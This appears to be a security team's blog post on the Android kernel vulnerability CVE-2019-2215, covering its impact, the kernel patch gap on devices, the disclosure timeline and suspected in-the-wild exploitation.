CVE-2019-2215 permits attackers to fully compromise a device with only untrusted app access or a browser renderer exploit. Despite the patch being available in the upstream Linux kernel, the bug was left unpatched in Android devices for almost 2 years. In that time, we believe that attackers have been able to use this vulnerability to exploit users in the wild. Given the information in various public documents about the services that NSO Group provides, it seems most likely that this vulnerability was chained with either a browser renderer exploit or other remote capability.
Kernel vulnerabilities in Android are especially dangerous because they are largely the same across different devices, whereas other components on the device, such as the framework, SOC, or pre-installed apps, are often customized from one device to another and across different manufacturers. With this single kernel vulnerability, the majority of Android devices manufactured prior to September 2018 were vulnerable. The patch gapping between the LTS Linux kernel, the Android common kernel, and the kernels running on end-users’ devices leaves a ripe surface area for exploitation. To prevent issues like this, Android could force all devices to sync to both upstream Linux and the Android common kernel at a regular cadence.
We publicly disclosed CVE-2019-2215 on October 3, 2019, 7 days after reporting to Android, due to credible evidence of in-the-wild exploitation. We made this determination based on documents marketing and detailing an Android exploit “capability”. Our view is that it's often reasonable to infer that a vulnerability is being exploited in the wild from other forms of contextual information (such as the marketing materials seen in this case, combined with a deep analysis of patches) and that a binary/sample isn’t always required. Therefore, each day we waited to disclose meant another day that at-risk users were exposed to harm.
On October 6, 2019, Android added updates to the October Android Security Bulletin and addressed the issue. Devices showing a security patch level on or after Oct 6, 2019 should be patched against CVE-2019-2215.
This bug highlights that in order to “make zero-day hard”, we need to work to learn as much as we can from 0-days used in the wild AND share it back with the community so that we can all work together to make this kind of exploitation that much harder. Please reach out and let’s collaborate!
tl;dr
- Leads, even without samples, can help us find bugs and get security vulnerabilities patched.
- The patch gap between released devices and the kernel leaves a ripe area for exploitation. The kernel is a key layer in Android’s security model.
- Project Zero is ramping up its in-the-wild 0day analysis work, and we're very open to collaboration. Please reach out!